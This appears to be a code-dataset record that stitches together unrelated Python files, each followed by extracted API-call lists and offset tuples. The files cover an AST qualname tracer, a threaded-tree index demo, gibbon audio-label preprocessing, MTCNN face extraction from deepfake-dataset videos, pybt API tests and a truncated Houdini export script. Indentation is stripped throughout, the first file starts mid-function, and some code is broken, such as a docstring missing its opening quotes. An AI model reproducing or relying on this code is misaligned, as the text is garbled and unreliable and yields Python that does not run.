# inspect source to retrace definition
source, line_no = inspect.findsource(obj)
try:
__qualname__ = QNameTracer(''.join(source)).at_line_no(line_no)
except KeyError as err:
no_qualname_exception.__context__ = err
raise no_qualname_exception
return __qualname__
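# Usage sketch (names are illustrative): given
#   class Spam:
#       def eggs(self): pass
# qualname(Spam.eggs) is expected to return 'Spam.eggs', i.e. the value Python 3
# exposes as __qualname__, reconstructed from source when the attribute is missing.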
def get_qualname(module, line_no):
"""
Return the qualname corresponding to a definition
Parses the abstract syntax tree to reconstruct the name of scopes.
A qualname is defined at the beginning of a scope - a ``class`` or
``def`` statement.
:param module: name of the module in which the definition is performed
:param line_no: line number at which the definition is performed
:return: qualname at ``line_no`` of ``module``
:raises: KeyError if ``module`` or ``line_no`` do not point to valid definitions
"""
module = sys.modules[module]
source, _ = inspect.findsource(module)
return QNameTracer(''.join(source)).at_line_no(line_no)
class QNameTracer(ast.NodeVisitor):
_cache = weakref.WeakValueDictionary()
_cache_fifo = collections.deque(maxlen=10) # limit cache to 10 elements
_init = False
def __new__(cls, source):
try:
return cls._cache[source]
except KeyError:
self = ast.NodeVisitor.__new__(cls)
cls._cache[source] = self
cls._cache_fifo.append(self)
return self
def __init__(self, source):
if self._init:
return
ast.NodeVisitor.__init__(self)
self._name_stack = []
self._lno_qualname = {}
self.visit(ast.parse(source=source))
self._init = True
def at_line_no(self, line_no):
return self._lno_qualname[line_no]
def _set_qualname(self, ast_line_no, push_qualname=None):
# ast_line_no starts at 1, inspect line_no starts at 0
line_no = ast_line_no
name_stack = self._name_stack + ([push_qualname] if push_qualname is not None else [])
self._lno_qualname[line_no] = '.'.join(name_stack)
def visit_FunctionDef(self, node):
# enter scope
self._name_stack.append(node.name)
self._set_qualname(node.lineno)
# proceed in function local namespace
self._name_stack.append('<locals>')
self.generic_visit(node)
# unwind at exit
self._name_stack.pop()
self._name_stack.pop()
def visit_ClassDef(self, node):
# enter scope
self._name_stack.append(node.name)
self._set_qualname(node.lineno)
# proceed at same scope
self.generic_visit(node)
# unwind at exit
self._name_stack.pop()
def visit_Exec(self, node):
try:
qnames = self.__class__(node.body.s)
except SyntaxError:
return
for ast_line_no, exec_qualname in qnames._lno_qualname.items():
self._set_qualname(node.lineno + ast_line_no, push_qualname=exec_qualname)
|
[
"ast.NodeVisitor.__init__",
"ast.NodeVisitor.__new__",
"inspect.findsource",
"ast.parse",
"collections.deque",
"weakref.WeakValueDictionary"
] |
[((633, 656), 'inspect.findsource', 'inspect.findsource', (['obj'], {}), '(obj)\n', (651, 656), False, 'import inspect\n'), ((1477, 1503), 'inspect.findsource', 'inspect.findsource', (['module'], {}), '(module)\n', (1495, 1503), False, 'import inspect\n'), ((1615, 1644), 'weakref.WeakValueDictionary', 'weakref.WeakValueDictionary', ([], {}), '()\n', (1642, 1644), False, 'import weakref\n'), ((1663, 1691), 'collections.deque', 'collections.deque', ([], {'maxlen': '(10)'}), '(maxlen=10)\n', (1680, 1691), False, 'import collections\n'), ((2081, 2111), 'ast.NodeVisitor.__init__', 'ast.NodeVisitor.__init__', (['self'], {}), '(self)\n', (2105, 2111), False, 'import ast\n'), ((2193, 2217), 'ast.parse', 'ast.parse', ([], {'source': 'source'}), '(source=source)\n', (2202, 2217), False, 'import ast\n'), ((1866, 1894), 'ast.NodeVisitor.__new__', 'ast.NodeVisitor.__new__', (['cls'], {}), '(cls)\n', (1889, 1894), False, 'import ast\n')]
|
"""The module demonstrates using threaded binary trees to implement ordered index."""
from typing import Any
from forest.binary_trees import single_threaded_binary_trees
from forest.binary_trees import traversal
class MyDatabase:
"""Example using threaded binary trees to build index."""
def __init__(self) -> None:
self._left_bst = single_threaded_binary_trees.LeftThreadedBinaryTree()
self._right_bst = single_threaded_binary_trees.RightThreadedBinaryTree()
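        # Two threaded trees are kept so that ascending dumps (right-threaded, in-order)
        # and descending dumps (left-threaded, reverse in-order) can both follow threads
        # directly, without recursion or an explicit stack.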
def _persist(self, payload: Any) -> str:
        Fake function pretending to store data to the file system.
Returns
-------
str
Path to the payload.
"""
return f"path_to_{payload}"
def insert_data(self, key: Any, payload: Any) -> None:
"""Insert data.
Parameters
----------
key: Any
Unique key for the payload
payload: Any
Any data
"""
path = self._persist(payload=payload)
self._left_bst.insert(key=key, data=path)
self._right_bst.insert(key=key, data=path)
def dump(self, ascending: bool = True) -> traversal.Pairs:
"""Dump the data.
Parameters
----------
ascending: bool
The order of data.
Yields
------
`Pairs`
The next (key, data) pair.
"""
if ascending:
return self._right_bst.inorder_traverse()
else:
return self._left_bst.reverse_inorder_traverse()
if __name__ == "__main__":
# Initialize the database.
my_database = MyDatabase()
# Add some items.
my_database.insert_data("Adam", "adam_data")
my_database.insert_data("Bob", "bob_data")
my_database.insert_data("Peter", "peter_data")
my_database.insert_data("David", "david_data")
# Dump the items in ascending order.
print("Ascending...")
for contact in my_database.dump():
print(contact)
print("\nDescending...")
    # Dump the data in descending order.
for contact in my_database.dump(ascending=False):
print(contact)
|
[
"forest.binary_trees.single_threaded_binary_trees.LeftThreadedBinaryTree",
"forest.binary_trees.single_threaded_binary_trees.RightThreadedBinaryTree"
] |
[((354, 407), 'forest.binary_trees.single_threaded_binary_trees.LeftThreadedBinaryTree', 'single_threaded_binary_trees.LeftThreadedBinaryTree', ([], {}), '()\n', (405, 407), False, 'from forest.binary_trees import single_threaded_binary_trees\n'), ((434, 488), 'forest.binary_trees.single_threaded_binary_trees.RightThreadedBinaryTree', 'single_threaded_binary_trees.RightThreadedBinaryTree', ([], {}), '()\n', (486, 488), False, 'from forest.binary_trees import single_threaded_binary_trees\n')]
|
import os
import numpy as np
import pandas as pd
'''This script preprocesses the labels, finds mistakes in them, and stores the labels in a unified format in the processed_label directory'''
file_dic_Extra = os.listdir('../../label/Extra_Labels')
file_dic_Train = os.listdir('../../label/Train_labels')
file_dic_Test = os.listdir('../../label/Test_labels')
#store the gibbon call duration distribution
duration_dist = np.array([])
duration_dist2 = np.array([])
for file_name in file_dic_Extra: # go through the Extra_Labels directory
if file_name[0] == 'g':
gibbon_timestamps = pd.read_csv('../../label/Extra_Labels/' + file_name, sep=',')
duration = np.asarray(gibbon_timestamps['Duration'])
duration_dist = np.concatenate((duration_dist, duration), axis = 0)
        # test whether the duration equals 'end' - 'start'
duration2 = np.asarray(gibbon_timestamps['End'] - gibbon_timestamps['Start'])
duration_dist2 = np.concatenate((duration_dist2, duration2), axis = 0)
if duration.size != 0 :
if min(duration) <= 0:
print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[2:], index = 0)
for file_name in file_dic_Train: # go through the Train_Labels directory
if file_name[0] == 'g':
gibbon_timestamps = pd.read_csv('../../label/Train_Labels/' + file_name, sep=',')
duration = np.asarray(gibbon_timestamps['Duration'])
duration_dist = np.concatenate((duration_dist, duration), axis = 0)
        # test whether the duration equals 'end' - 'start'
duration2 = np.asarray(gibbon_timestamps['End'] - gibbon_timestamps['Start'])
duration_dist2 = np.concatenate((duration_dist2, duration2), axis = 0)
if duration.size != 0:
if min(duration) <= 0:
print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[2:], index = 0)
# results show that duration equals 'end' - 'start'
test_duration = duration_dist2 == duration_dist
duration_test_result = np.where(test_duration == False)
if duration_test_result[0].size == 0:
    print('duration equals end - start')
else:
    print('duration record typo exists')
for file_name in file_dic_Test: # go through the Test_Labels directory and save data to the processed_label directory
gibbon_timestamps = pd.read_csv('../../label/Test_Labels/' + file_name, sep=',')
gibbon_timestamps['End'] = gibbon_timestamps['Start'] + gibbon_timestamps['Duration']
gibbon_timestamps = gibbon_timestamps[['Start', 'End', 'Duration']]
    duration = np.asarray(gibbon_timestamps['Duration']) # durations for the current test file
    if duration.size != 0:
        if min(duration) <= 0:
            print(file_name, 'has wrong record')
gibbon_timestamps.to_csv('../../label/processed_label/' + file_name[:-9] + '.data', index = 0)
# g_HGSM3BD_0+1_20160305_060000.data has wrong record
# g_HGSM3AC_0+1_20160312_055400.data has wrong record
# these two files have durations that are negative or zero because of typos; the errors have been fixed in processed_label manually.
|
[
"pandas.read_csv",
"numpy.asarray",
"numpy.where",
"numpy.array",
"os.listdir",
"numpy.concatenate"
] |
[((203, 241), 'os.listdir', 'os.listdir', (['"""../../label/Extra_Labels"""'], {}), "('../../label/Extra_Labels')\n", (213, 241), False, 'import os\n'), ((259, 297), 'os.listdir', 'os.listdir', (['"""../../label/Train_labels"""'], {}), "('../../label/Train_labels')\n", (269, 297), False, 'import os\n'), ((314, 351), 'os.listdir', 'os.listdir', (['"""../../label/Test_labels"""'], {}), "('../../label/Test_labels')\n", (324, 351), False, 'import os\n'), ((414, 426), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (422, 426), True, 'import numpy as np\n'), ((444, 456), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (452, 456), True, 'import numpy as np\n'), ((2134, 2166), 'numpy.where', 'np.where', (['(test_duration == False)'], {}), '(test_duration == False)\n', (2142, 2166), True, 'import numpy as np\n'), ((2435, 2495), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Test_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Test_Labels/' + file_name, sep=',')\n", (2446, 2495), True, 'import pandas as pd\n'), ((588, 649), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Extra_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Extra_Labels/' + file_name, sep=',')\n", (599, 649), True, 'import pandas as pd\n'), ((669, 710), 'numpy.asarray', 'np.asarray', (["gibbon_timestamps['Duration']"], {}), "(gibbon_timestamps['Duration'])\n", (679, 710), True, 'import numpy as np\n'), ((735, 784), 'numpy.concatenate', 'np.concatenate', (['(duration_dist, duration)'], {'axis': '(0)'}), '((duration_dist, duration), axis=0)\n', (749, 784), True, 'import numpy as np\n'), ((873, 938), 'numpy.asarray', 'np.asarray', (["(gibbon_timestamps['End'] - gibbon_timestamps['Start'])"], {}), "(gibbon_timestamps['End'] - gibbon_timestamps['Start'])\n", (883, 938), True, 'import numpy as np\n'), ((964, 1015), 'numpy.concatenate', 'np.concatenate', (['(duration_dist2, duration2)'], {'axis': '(0)'}), '((duration_dist2, duration2), axis=0)\n', (978, 1015), True, 'import numpy as np\n'), ((1365, 1426), 'pandas.read_csv', 'pd.read_csv', (["('../../label/Train_Labels/' + file_name)"], {'sep': '""","""'}), "('../../label/Train_Labels/' + file_name, sep=',')\n", (1376, 1426), True, 'import pandas as pd\n'), ((1446, 1487), 'numpy.asarray', 'np.asarray', (["gibbon_timestamps['Duration']"], {}), "(gibbon_timestamps['Duration'])\n", (1456, 1487), True, 'import numpy as np\n'), ((1512, 1561), 'numpy.concatenate', 'np.concatenate', (['(duration_dist, duration)'], {'axis': '(0)'}), '((duration_dist, duration), axis=0)\n', (1526, 1561), True, 'import numpy as np\n'), ((1650, 1715), 'numpy.asarray', 'np.asarray', (["(gibbon_timestamps['End'] - gibbon_timestamps['Start'])"], {}), "(gibbon_timestamps['End'] - gibbon_timestamps['Start'])\n", (1660, 1715), True, 'import numpy as np\n'), ((1741, 1792), 'numpy.concatenate', 'np.concatenate', (['(duration_dist2, duration2)'], {'axis': '(0)'}), '((duration_dist2, duration2), axis=0)\n', (1755, 1792), True, 'import numpy as np\n')]
|
import shutil, os, glob
import pandas as pd
for ratio in [0, 5, 10, 20, 30, 40, 50, 60, 70, 80, 90, 95, 100]:
metafile = 'partitionmeta/meta' + str(ratio) + '.csv'
df = pd.read_csv(metafile, index_col = 'docid')
for i in df.index:
if df.loc[i, 'tags'] != 'random':
continue
outpath = 'mix/' + str(ratio) + '/' + i + '.tsv'
shutil.copyfile('../data/' + i + '.tsv', outpath)
|
[
"pandas.read_csv",
"shutil.copyfile"
] |
[((178, 218), 'pandas.read_csv', 'pd.read_csv', (['metafile'], {'index_col': '"""docid"""'}), "(metafile, index_col='docid')\n", (189, 218), True, 'import pandas as pd\n'), ((372, 421), 'shutil.copyfile', 'shutil.copyfile', (["('../data/' + i + '.tsv')", 'outpath'], {}), "('../data/' + i + '.tsv', outpath)\n", (387, 421), False, 'import shutil, os, glob\n')]
|
import os
import cv2
from concurrent.futures import ProcessPoolExecutor
import torch
from facenet_pytorch import MTCNN
from tqdm import tqdm
from PIL import Image
import pickle
from face_detection import RetinaFace
from bisect import bisect_left
from collections import Counter
import math
import cvlib as cv # assumed import: find_max_face() below calls cv.detect_face, which matches cvlib's face detection API
def delete_folders():
"""Deletes the frames folder from each directory in folder_list"""
from shutil import rmtree
for f in folder_list:
folder_to_delete = os.path.join(f, "frames")
rmtree(folder_to_delete)
def create_folders():
"""
Creates a folder called frames in each directory and creates subfolders for
each video in the frames folder.
"""
for f in folder_list:
os.mkdir(os.path.join(f, "frames"))
for fil in os.listdir(f):
fil = fil.split(".")[0]
if fil != "metadata" and fil != "frames":
os.mkdir(os.path.join(f, "frames", fil))
def convert_video_to_frames(input_path, output_folder):
"""Extract all frames from a video"""
count = 0
cap = cv2.VideoCapture(input_path)
while cap.isOpened():
ret, frame = cap.read()
if not ret:
break
cv2.imwrite(os.path.join(output_folder, f"frame_{count}.png"), frame)
count += 1
cap.release()
def find_max_face(input_image):
"""
Finds face in input_image with maximum confidence and returns it
Adds padding of 15px around face
"""
detection = cv.detect_face(input_image)
if detection is not None:
faces, confidences = detection
if confidences:
max_conf = max(confidences)
face = faces[confidences.index(max_conf)]
(startX, startY) = face[0], face[1]
(endX, endY) = face[2], face[3]
height, width, _ = input_image.shape
y_top = max(startY - 15, 0)
x_top = max(startX - 15, 0)
y_bot = min(endY + 15, height)
x_bot = min(endX + 15, width)
return input_image[y_top:y_bot, x_top:x_bot]
return None
def convert_video_to_frames_periodic(name_prefix, input_path, output_folder, dt):
"""Captures a frame every dt milliseconds"""
count = 0
cap = cv2.VideoCapture(input_path)
success, image = cap.read()
while success:
cap.set(cv2.CAP_PROP_POS_MSEC, (count * dt))
success, frame = cap.read()
cv2.imwrite(os.path.join(output_folder, f"{name_prefix}_frame_{count}.png"), frame)
count += 1
cap.release()
def convert_video_to_face_frames_periodic(name_prefix, input_path, output_folder, dt):
"""Captures a frame and tries to detect and save a face in it every dt milliseconds"""
count = 0
num_face = 0
cap = cv2.VideoCapture(input_path)
success, image = cap.read()
while success:
cap.set(cv2.CAP_PROP_POS_MSEC, (count * dt))
success, frame = cap.read()
face = find_max_face(frame)
if face is not None:
cv2.imwrite(os.path.join(output_folder, f"{name_prefix}_face_{num_face}.png"), face)
num_face += 1
count += 1
if num_face < 5:
print(name_prefix + f" has {num_face} faces")
cap.release()
def create_frames(executor):
for f in folder_list:
print(f"In folder {f}")
for video in os.listdir(f):
if video != "metadata.json" and video != "frames":
# print(f"Processing video {video}")
input_path = os.path.join(f, video)
video_folder = video.split(".")[0]
output_folder = os.path.join(f, "frames", video_folder)
executor.submit(convert_video_to_face_frames_periodic, video_folder, input_path, output_folder, 1000)
# convert_video_to_face_frames_periodic(video_folder, input_path, output_folder, 800)
def convert_with_mtcnn_parallel(detector, base_folder, folder):
print(folder)
def func(video):
return convert_video_to_frames_per_frame(os.path.join(folder, video), 10)
video_list = os.listdir(folder)
video_list.remove("metadata.json")
video_list.remove("frames")
video_list.remove("audio")
with ProcessPoolExecutor(20) as pool:
frame_list = pool.map(func, video_list, chunksize=1)
for video, frames in zip(video_list, frame_list):
base_video = video.split(".")[0]
detect_faces_mtcnn_and_save(detector, base_folder, base_video, frames)
def get_frame_count(cap):
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
return num_frames
def get_exact_frames(cap, frame_indices):
"""Gets all frames with the indices in frame indices (0 based)"""
frames = []
for index in frame_indices:
cap.set(cv2.CAP_PROP_POS_FRAMES, index)
ret, frame = cap.read()
if ret:
frames.append(frame)
return frames
def get_exact_frames_for_optical_flow(cap, frame_indices):
"""Gets all frames and 4 ahead with the indices in frame indices (0 based)"""
frames = []
index_list = []
for index in frame_indices:
for i in range(4):
idx = index + i
cap.set(cv2.CAP_PROP_POS_FRAMES, idx)
ret, frame = cap.read()
if ret:
image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, channels = image.shape
image = cv2.resize(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)
frames.append(image)
index_list.append(idx)
return frames, index_list
def load_model(device):
device = torch.device(device)
detector = MTCNN(device=device, keep_all=True, select_largest=False, post_process=False)
return detector
def mtcnn_detect(detector, frames, path, vid_name):
data = []
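    # Each element of `data` is a set of (x, y, area, frame_index, box_index) tuples:
    # detections grouped across frames by spatial proximity and similar box area, so that
    # only consistently tracked faces (sets with more than 9 hits) are written out below.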
def get_dist(px,py,x,y):
return abs(px - x) + abs(py - y)
def get_min_coords(s, x,y):
min_set = max(s, key=lambda k:get_dist(k[0], k[1], x,y))
return min_set[0], min_set[1], min_set[2]
def get_avg_coords(s):
x,y = 0.0,0.0
for dd in s:
px,py,*rest = dd
x += px
y += py
tot = len(s)
return x/tot, y/tot
def add_to_closest_set(x,y,area,bi,bj):
min_dist = float('inf')
idx = -1
for i, s in enumerate(data):
px,py,pa = get_min_coords(s,x,y)
dist = get_dist(px,py,x,y)
areas = sorted([pa, area])
if dist > 175 or (areas[1] / areas[0]) > 1.3:
continue
if dist < min_dist:
                min_dist = dist # remember the closest matching cluster found so far
idx = i
if idx == -1:
stuff = (x,y,area,bi,bj,)
ss = set()
ss.add(stuff)
data.append(ss)
else:
data[idx].add((x,y,area,bi,bj,))
stored_frames = []
def get_box(face_box, shape, padding=15):
(startX, startY) = int(face_box[0]), int(face_box[1])
(endX, endY) = int(face_box[2]), int(face_box[3])
height, width, _ = shape
y_top = max(startY - padding, 0)
x_top = max(startX - padding, 0)
y_bot = min(endY + padding, height)
x_bot = min(endX + padding, width)
return y_top, y_bot, x_top, x_bot
frames_boxes, frames_confidences = detector.detect([Image.fromarray(x) for x in frames], landmarks=False)
for batch_idx, (frame_boxes, frame_confidences) in enumerate(zip(frames_boxes, frames_confidences)):
frame = frames[batch_idx]
stored_frames.append(frame_boxes)
if (frame_boxes is not None) and (len(frame_boxes) > 0):
frame_locations = []
for j, (face_box, confidence) in enumerate(zip(frame_boxes, frame_confidences)):
(y, yb, x, xb) = get_box(face_box, frame.shape, 0)
area = (yb - y) * (xb - x)
if not data:
stuff = (x,y,area,batch_idx,j,)
ss = set()
ss.add(stuff)
data.append(ss)
else:
add_to_closest_set(x,y,area,batch_idx,j)
count = 0
for i, d in enumerate(data):
if len(d) > 9:
for f in d:
rx,ry,area,i,j = f
frame = frames[i]
box = stored_frames[i][j]
(y, yb, x, xb) = get_box(box, frame.shape, 10)
face_extract = frame[y : yb, x : xb]
pa = f'{path}/{vid_name}_{len(d)}_{count}.png'
cv2.imwrite(pa,cv2.cvtColor(face_extract, cv2.COLOR_RGB2BGR))
count += 1
def convert_video_to_frames_per_frame(capture, per_n):
num_frames = get_frame_count(capture)
frames = []
for i in range(0, num_frames):
ret = capture.grab()
if i % per_n == 0:
ret, image = capture.retrieve()
if ret:
height, width, channels = image.shape
image = cv2.resize(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
frames.append(image)
return frames
def load_model_retina(device):
return RetinaFace(gpu_id=0)
def detect_faces_mtcnn_and_save(detector, base_folder, base_video, frames, filenames=None):
pil_images = [Image.fromarray(frame) for frame in frames]
if filenames is None:
filenames = [os.path.join(base_folder, f"{base_video}_face_{i}.png") for i, _ in enumerate(pil_images)]
faces = detector(pil_images, filenames)
return faces
def convert_video_to_frames_with_mtcnn(detector, base_folder, folder):
print(folder)
for video in tqdm(os.listdir(folder)):
name = video.split(".")
try:
name, extension = name[0], name[1]
except IndexError:
continue
if extension == "mp4":
try:
capture = cv2.VideoCapture(os.path.join(folder, video))
total_frames = get_frame_count(capture)
frame_begin = 10
frame_end = total_frames - 8
begin_indices = [i for i in range(frame_begin, frame_end, total_frames // 4)]
frames, indices = get_exact_frames_for_optical_flow(capture, begin_indices)
new_video_folder = os.path.join(base_folder, name)
os.mkdir(new_video_folder)
filenames = [os.path.join(new_video_folder, f"{name}_face_{i}.png") for i in indices]
detect_faces_mtcnn_and_save(detector, new_video_folder, name, frames, filenames)
capture.release()
except Exception as e:
print(video)
print(e)
continue
if __name__ == "__main__":
# base_folder = "/home/teh_devs/deepfake/raw/test_vids"
"""
Rescaled by 4 need testing
"""
from glob import glob
storage_dir = '/home/teh_devs/deepfake/dataset/revamp'
folder_list = []
print("Doing first 5 folders")
for i in range(0, 5):
folder_list.append(f"/home/teh_devs/deepfake/raw/dfdc_train_part_{i}")
detector = load_model(device="cuda:0")
# f = '/home/teh_devs/deepfake/raw/dfdc_train_part_4/srqogltgnx.mp4'
for f in folder_list:
print(f)
videos = glob(f + '/*.mp4')
for vid in tqdm(videos, ncols=0):
try:
vid_name = vid.split('/')[-1].split('.')[0]
capture = cv2.VideoCapture(vid)
frames = convert_video_to_frames_per_frame(capture, 10)
new_folder = os.path.join(storage_dir, vid_name)
os.mkdir(new_folder)
mtcnn_detect(detector, frames, new_folder, vid_name)
capture.release()
except Exception as e:
print(e)
# for f in folder_list:
# convert_video_to_frames_with_mtcnn(detector, base_folder, f)
|
[
"os.mkdir",
"tqdm.tqdm",
"face_detection.RetinaFace",
"cv2.cvtColor",
"concurrent.futures.ProcessPoolExecutor",
"cv2.VideoCapture",
"PIL.Image.fromarray",
"glob.glob",
"facenet_pytorch.MTCNN",
"torch.device",
"shutil.rmtree",
"os.path.join",
"os.listdir",
"cv2.resize"
] |
[((1059, 1087), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (1075, 1087), False, 'import cv2\n'), ((2226, 2254), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (2242, 2254), False, 'import cv2\n'), ((2745, 2773), 'cv2.VideoCapture', 'cv2.VideoCapture', (['input_path'], {}), '(input_path)\n', (2761, 2773), False, 'import cv2\n'), ((4056, 4074), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (4066, 4074), False, 'import os\n'), ((5605, 5625), 'torch.device', 'torch.device', (['device'], {}), '(device)\n', (5617, 5625), False, 'import torch\n'), ((5641, 5718), 'facenet_pytorch.MTCNN', 'MTCNN', ([], {'device': 'device', 'keep_all': '(True)', 'select_largest': '(False)', 'post_process': '(False)'}), '(device=device, keep_all=True, select_largest=False, post_process=False)\n', (5646, 5718), False, 'from facenet_pytorch import MTCNN\n'), ((9213, 9233), 'face_detection.RetinaFace', 'RetinaFace', ([], {'gpu_id': '(0)'}), '(gpu_id=0)\n', (9223, 9233), False, 'from face_detection import RetinaFace\n'), ((468, 493), 'os.path.join', 'os.path.join', (['f', '"""frames"""'], {}), "(f, 'frames')\n", (480, 493), False, 'import os\n'), ((502, 526), 'shutil.rmtree', 'rmtree', (['folder_to_delete'], {}), '(folder_to_delete)\n', (508, 526), False, 'from shutil import rmtree\n'), ((773, 786), 'os.listdir', 'os.listdir', (['f'], {}), '(f)\n', (783, 786), False, 'import os\n'), ((3324, 3337), 'os.listdir', 'os.listdir', (['f'], {}), '(f)\n', (3334, 3337), False, 'import os\n'), ((4186, 4209), 'concurrent.futures.ProcessPoolExecutor', 'ProcessPoolExecutor', (['(20)'], {}), '(20)\n', (4205, 4209), False, 'from concurrent.futures import ProcessPoolExecutor\n'), ((9346, 9368), 'PIL.Image.fromarray', 'Image.fromarray', (['frame'], {}), '(frame)\n', (9361, 9368), False, 'from PIL import Image\n'), ((9702, 9720), 'os.listdir', 'os.listdir', (['folder'], {}), '(folder)\n', (9712, 9720), False, 'import os\n'), ((11325, 11343), 'glob.glob', 'glob', (["(f + '/*.mp4')"], {}), "(f + '/*.mp4')\n", (11329, 11343), False, 'from glob import glob\n'), ((11363, 11384), 'tqdm.tqdm', 'tqdm', (['videos'], {'ncols': '(0)'}), '(videos, ncols=0)\n', (11367, 11384), False, 'from tqdm import tqdm\n'), ((727, 752), 'os.path.join', 'os.path.join', (['f', '"""frames"""'], {}), "(f, 'frames')\n", (739, 752), False, 'import os\n'), ((1204, 1253), 'os.path.join', 'os.path.join', (['output_folder', 'f"""frame_{count}.png"""'], {}), "(output_folder, f'frame_{count}.png')\n", (1216, 1253), False, 'import os\n'), ((2415, 2478), 'os.path.join', 'os.path.join', (['output_folder', 'f"""{name_prefix}_frame_{count}.png"""'], {}), "(output_folder, f'{name_prefix}_frame_{count}.png')\n", (2427, 2478), False, 'import os\n'), ((4005, 4032), 'os.path.join', 'os.path.join', (['folder', 'video'], {}), '(folder, video)\n', (4017, 4032), False, 'import os\n'), ((7338, 7356), 'PIL.Image.fromarray', 'Image.fromarray', (['x'], {}), '(x)\n', (7353, 7356), False, 'from PIL import Image\n'), ((9437, 9492), 'os.path.join', 'os.path.join', (['base_folder', 'f"""{base_video}_face_{i}.png"""'], {}), "(base_folder, f'{base_video}_face_{i}.png')\n", (9449, 9492), False, 'import os\n'), ((3003, 3068), 'os.path.join', 'os.path.join', (['output_folder', 'f"""{name_prefix}_face_{num_face}.png"""'], {}), "(output_folder, f'{name_prefix}_face_{num_face}.png')\n", (3015, 3068), False, 'import os\n'), ((3484, 3506), 'os.path.join', 'os.path.join', (['f', 'video'], {}), '(f, video)\n', (3496, 3506), 
False, 'import os\n'), ((3590, 3629), 'os.path.join', 'os.path.join', (['f', '"""frames"""', 'video_folder'], {}), "(f, 'frames', video_folder)\n", (3602, 3629), False, 'import os\n'), ((5268, 5306), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (5280, 5306), False, 'import cv2\n'), ((5385, 5459), 'cv2.resize', 'cv2.resize', (['image', '(width // 2, height // 2)'], {'interpolation': 'cv2.INTER_AREA'}), '(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)\n', (5395, 5459), False, 'import cv2\n'), ((8977, 9051), 'cv2.resize', 'cv2.resize', (['image', '(width // 2, height // 2)'], {'interpolation': 'cv2.INTER_AREA'}), '(image, (width // 2, height // 2), interpolation=cv2.INTER_AREA)\n', (8987, 9051), False, 'import cv2\n'), ((9076, 9114), 'cv2.cvtColor', 'cv2.cvtColor', (['image', 'cv2.COLOR_BGR2RGB'], {}), '(image, cv2.COLOR_BGR2RGB)\n', (9088, 9114), False, 'import cv2\n'), ((10340, 10371), 'os.path.join', 'os.path.join', (['base_folder', 'name'], {}), '(base_folder, name)\n', (10352, 10371), False, 'import os\n'), ((10388, 10414), 'os.mkdir', 'os.mkdir', (['new_video_folder'], {}), '(new_video_folder)\n', (10396, 10414), False, 'import os\n'), ((11489, 11510), 'cv2.VideoCapture', 'cv2.VideoCapture', (['vid'], {}), '(vid)\n', (11505, 11510), False, 'import cv2\n'), ((11612, 11647), 'os.path.join', 'os.path.join', (['storage_dir', 'vid_name'], {}), '(storage_dir, vid_name)\n', (11624, 11647), False, 'import os\n'), ((11664, 11684), 'os.mkdir', 'os.mkdir', (['new_folder'], {}), '(new_folder)\n', (11672, 11684), False, 'import os\n'), ((903, 933), 'os.path.join', 'os.path.join', (['f', '"""frames"""', 'fil'], {}), "(f, 'frames', fil)\n", (915, 933), False, 'import os\n'), ((8555, 8600), 'cv2.cvtColor', 'cv2.cvtColor', (['face_extract', 'cv2.COLOR_RGB2BGR'], {}), '(face_extract, cv2.COLOR_RGB2BGR)\n', (8567, 8600), False, 'import cv2\n'), ((9954, 9981), 'os.path.join', 'os.path.join', (['folder', 'video'], {}), '(folder, video)\n', (9966, 9981), False, 'import os\n'), ((10444, 10498), 'os.path.join', 'os.path.join', (['new_video_folder', 'f"""{name}_face_{i}.png"""'], {}), "(new_video_folder, f'{name}_face_{i}.png')\n", (10456, 10498), False, 'import os\n')]
|
import unittest
import warnings
from pybt.system import System
from pybt.exceptions import InvalidAPIKey
from .config import CONFIG
class ClientTestCase(unittest.TestCase):
def setUp(self):
warnings.simplefilter('ignore', ResourceWarning)
self.api = System(CONFIG.get("panel_address"), CONFIG.get("api_key"))
def test_api_key_error(self):
with self.assertRaises(InvalidAPIKey):
api_err_key = System(CONFIG.get("panel_address"), "somewords"+CONFIG.get("api_key"))
api_err_key.get_system_total()
def test_get_system_total(self):
self.assertIsInstance(self.api.get_system_total(), dict)
self.assertIn("system", self.api.get_system_total())
self.assertIn("version", self.api.get_system_total())
def test_get_disk_info(self):
self.assertIsInstance(self.api.get_disk_info(), list)
self.assertIn("filesystem", self.api.get_disk_info()[0])
self.assertIn("type", self.api.get_disk_info()[0])
def test_get_net_work(self):
self.assertIsInstance(self.api.get_net_work(), dict)
self.assertIn("network", self.api.get_net_work())
def test_get_task_count(self):
self.assertIsInstance(self.api.get_task_count(), int)
def test_update_panel(self):
self.assertIsInstance(self.api.update_panel(), dict)
self.assertIn("status", self.api.update_panel())
self.assertIn("version", self.api.update_panel().get('msg'))
|
[
"warnings.simplefilter"
] |
[((205, 253), 'warnings.simplefilter', 'warnings.simplefilter', (['"""ignore"""', 'ResourceWarning'], {}), "('ignore', ResourceWarning)\n", (226, 253), False, 'import warnings\n')]
|
# coding: utf-8
# Author: <NAME>
# Contact: <EMAIL>
# Python modules
import traceback
import os
import logging
logger = logging.getLogger(__name__)
# Wizard modules
from houdini_wizard import wizard_tools
from houdini_wizard import wizard_export
# Houdini modules
def main():
scene = wizard_export.save_or_save_increment()
try:
out_nodes_dic = {'wizard_modeling_output_LOD1':'LOD1',
'wizard_modeling_output_LOD2':'LOD2',
'wizard_modeling_output_LOD3':'LOD3'}
for out_node_name in out_nodes_dic.keys():
if wizard_tools.check_out_node_existence(out_node_name):
export_name = out_nodes_dic[out_node_name]
wizard_export.trigger_before_export_hook('modeling')
